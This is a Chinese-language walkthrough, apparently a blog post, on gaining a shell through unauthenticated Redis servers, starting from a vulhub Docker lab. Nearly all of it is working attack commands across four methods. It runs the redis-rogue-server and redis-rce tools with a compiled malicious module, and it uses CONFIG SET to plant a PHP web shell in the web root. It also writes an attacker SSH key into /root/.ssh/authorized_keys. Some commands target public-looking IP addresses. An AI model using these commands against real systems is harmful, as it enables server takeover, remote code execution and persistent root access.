redis得到shell的几种方法

 getshell(一)（上文）

docker演示

进入vulhub目录使用以下命令启动靶机

cd /vulhub-master/redis/4-unacc

docker-compose up -d

docker ps

kali中

安装redis

apt-get install redis

连接，ip换为docker容器ip地址

redis-cli -h 39.105.47.83 -p 6379

直接连接执行命令且不需要认证说明存在未授权访问漏洞

下载以下攻击项目

https://github.com/n0b0dyCN/redis-rogue-server

下载完成后解压

在项目目录下执行以下命令

python3 redis-rogue-server.py --rhost 39.105.47.83 --lhost 39.105.47.83

若执行错误，再次执行一下就行

输入i就可以进入shell

安装redis

建议在contos上安装，命令相同，下面只是演示      kali做攻击机

wget https://download.redis.io/releases/redis-4.0.9.tar.gz

tar zxvf redis-4.0.9.tar.gz

移动一下安装地点

mv redis-4.0.9 /usr/local/redis

make

make install

vim redis.conf

getshell(二)

需要有网站建立才能成功

在kali上输入

redis-cli -h 192.168.219.128 -p 6379

连接成功后，输入

CONFIG SET dir /var/www/html               修改存储路径为Web目录
CONFIG SET dbfilename shell.php               设置文件名为shell.php

SET shell "<?php system($_GET['cmd']);?>"          保存木马

save

蚁剑连接或直接网址访问

http://ip/shell.php

http://ip/shell.php?cmd=whoami

getshell(三)

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce.git

下载完成后进入RedisModules-ExecuteCommand目录输入make

会生成moudle.so 文件

然后把生成的moudle.so复制到redis-rce目录里面

进入 redis-rce目录里面终端输入

python redis-rce.py -r 192.168.111.132 -p 6379 -L 192.168.111.130 -f moudle.so

getshell(四)

公钥

ssh-keygen -t rsa  # 默认保存到~/.ssh/id_rsa.pub

(echo -e "\n";cat /root/.ssh/id_rsa.pub;echo -e "\n")>1.txt          记得修改为自己的密钥地址

输入
cat 1.txt |redis-cli -h 192.168.111.130 -x set crack

连接成功后在输入

config set dir /root/.ssh
config set dbfilename authorized_keys
save

使用ssh登录就可以了